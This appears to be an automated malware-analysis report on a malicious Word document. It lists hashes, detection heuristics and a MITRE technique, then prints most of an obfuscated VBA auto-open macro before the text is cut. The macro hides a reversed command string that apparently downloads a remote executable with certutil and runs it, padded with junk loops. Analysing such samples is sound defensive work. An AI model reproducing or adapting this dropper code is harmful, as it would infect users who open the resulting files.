Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 6e490f1d39ae7431…

MALICIOUS

Office (OLE)

120.5 KB Created: 2018-04-23 07:54:00 Authoring application: Microsoft Office Word First seen: 2019-10-01
MD5: 60f3bdb1d39ef0a45a8c6e10a8ed12e7 SHA-1: 621a798d92ab87136d8be3b8dac4fbd9014c038a SHA-256: 6e490f1d39ae743190ac73d06f0bdb3b4b271bdd927947f14311ad84088a47d2
222 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic

The sample contains VBA macros, including a Document_Open auto-execution macro that utilizes the Shell() function. This indicates an attempt to execute arbitrary code, likely to download and run a secondary payload. The ClamAV detection 'Doc.Malware.Chronos-6897935-0' further supports its malicious nature. The VBA code appears to be obfuscated, but the presence of Shell() and the auto-execution macro strongly suggest a downloader or dropper functionality.

Heuristics 6

  • ClamAV: Doc.Malware.Chronos-6897935-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.Chronos-6897935-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 31924 bytes
SHA-256: b3274a98ab866724df4190d0f787b1edf3eaf281bdf47f7df873f91f75ca5363
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
    Dim klqLwbEy As String
    zfJTAzB = Space(5)
    wiYwk = LTrim("oehIXP%L)tM")
    cDOhFqbS = RTrim("I^irYbRyp$F*tQLJ*")
    While pJzBOY < 384
        mbMVEt = RTrim("OKV&Np_qV-DmCeT(nFI")
        wDckaqpW = RTrim("_.T-d Y^gD$X]? Vdwf")
        lSrgni = 764 + 1489 + 158
        XseVJ = Right("pVJh !fT@iGtxaOJs", 2)
        cDOhFqbS = UCase("vMW#NA]_RwcHbb")
        zfJTAzB = 1458 - 265 - 1339
        PQYbJT = "If?*Q#eW*_r$Z(@U." + "fHX$eLLHp@[OUJbYS-Ey" + "X[X]n]#DPDbf@b"
        pJzBOY = pJzBOY + 2
    Wend

    ejfGsI = Left("M%xU$hAiOWgCDgkYi!t)", 3)
    zfJTAzB = Left("_)sZexm.DYCjpc@Dz", 2)
    cDOhFqbS = Left("XAWxjPooZxGQXdN", 3)
    mbMVEt = 1225 + 764 + 1984
    klqLwbEy = StrReverse("QeTxXeF.hIOBQXpiLDvCUez\#\k%]pumae-to%U o&E&^ EeZxYeE.FI.BfXgi[DsCSez\L\v%lpJmoeet$%A Se[xleG.ad%oxodgO/#sZuf.UocrCpasWr(eibPmDuel pU/^/^:TpPtkt.h] bfm-W Ot*iSlGpHs)-W -eDh(czaTc$lRrNuM-p seUx_eQ.MllintWuit$raeacR Jcn/I ZeWxlew.rdBmWc")
    zfJTAzB = "fnCsnsvaat#" + "xPGsi[?d#-" + "JynQ@EZUCAsl"
    LNnev = UCase("FT##EC$p@S")
    wDckaqpW = LTrim("Cs?b%*_%NzNSim%fp)n")
    zfJTAzB = "fTWce^CJ_n" + "hhdax@TPc$aHYpTP" + "VWWe#*Zd*[A"
    For KHJakJ = 0 To 38
        ejfGsI = Right("tUnFjOZ#PcKlVR$@SxoF", 4)
        ejfGsI = "?ZgGlWcG]jOLp" + "jM&DQ?fclg_DaYysp$P" + "O_pRrCd!$D"
        PQYbJT = Left("N$WfRDbwLHBf", 2)
        iPHNO = "k*vXHUe?Dzrdec]^Ke]_" + "$cSKBFE J[EvF&%J" + "AdfME&ogumo%a"
        MNqxhB = LTrim("L.GFRCVk_DeI")
        lSrgni = "EeGicTrkK@T" + "Uu]VBCctQP-lC^!o" + "FnjL!u&qL#"
        iPHNO = RTrim("(?i v kk^&")
        XseVJ = Left("vkTI.LzUFklp&cM", 4)
        lSrgni = UCase("Y_@ph)HpUYvzqT-o")
        LNnev = UCase("xQ qRmR$%!K(SLvg")
    Next KHJakJ

    While INQiYd < 400
        mbMVEt = LTrim("C_PcI bDNW.^JH*k")
        wDckaqpW = UCase("I WIpmDy L&(_-_?")
        LNnev = "dRne#ZaQXB*Y*TtV" + "Nib[TKHW#U_TYY" + "CgxI-$HyO(YR!uw?"
        INQiYd = INQiYd + 1
    Wend

    lSrgni = 1388 + 1704 + 1411
    mbMVEt = LTrim("Raw&p$U(MpqQe_")
    While NQiVJ < 641
        For zDouyj = 0 To 366
            XseVJ = LTrim("no_-CiH#ZCxHJmon@I")
            zfJTAzB = LTrim("O(AY[siMKb")
            MNqxhB = 1117 - 170 - 963
            iPHNO = LTrim("DV)bWHK[rwSmL*-")
            MNqxhB = "IkVba_PKaZOt#u]uf(" + "TZwcCCqM?@cldUJegh" + "tbVFVx@?lE*fZ F-m"
        Next zDouyj

        PQYbJT = "BOzv%MdIMGgSNRF&)" + "sz_wc#hogsH^Mrc$Q" + "iFybP[OR?ORbZ"
        LNnev = RTrim("hNhT&@.[KBqVDydLPh.)")
        While QEGpqM < 118
            lSrgni = Right("-WBHBk%$O%^vG#cLEph", 3)
            MNqxhB = 1501 - 414 - 1425
            wDckaqpW = Right("kf[ldPiR#vD*fXpQq", 2)
            LNnev = Right("_PzgttmyUEV_&)", 4)
            LNnev = RTrim("b%uibD[Ny$i")
            iPHNO = Right("BrUjpY!Le)dX.]", 3)
            XseVJ = 289 + 639 + 940
            QEGpqM = QEGpqM + 3
        Wend

        mbMVEt = LTrim("d!P#eWJo@ekEP%.N$W)q")
        For VXiNDv = 0 To 213
            lSrgni = UCase("@QxpNqa ok hQZdE")
            lSrgni = UCase(".GHDAo!pWiZt")
            LNnev = LTrim("?Fl%^@bQLyU!y")
            iPHNO = 767 - 801 - 741
            ejfGsI = UCase("rmC[J[Vp$ny")
            ejfGsI = 1126 + 1394 + 1262
            wiYwk = LTrim("-SzKtvrGMVqDHeS^_mI-")
            lSrgni = Right("!(L&PmDBamSP", 5)
        Next VXiNDv

        cDOhFqbS = Left("BXQRZL^aDUb(", 5)
        ejfGsI = 134 - 1367 - 893
        zfJTAzB = 652 + 790 + 252
        iPHNO = 1825 + 273 + 1809
        If NQiVJ = 558 Then
            mbMVEt = Right("**nWYunP)? q?XLav", 2)
            XseVJ = RTrim("Y*#EVZf%rJ")
            PQYbJT = UCase("Do-uXAHc*nwOg^eu.#G")
            While ouaVtt < 177
                zfJTAzB = Space(14)
                MNqxhB = 763 -
... (truncated)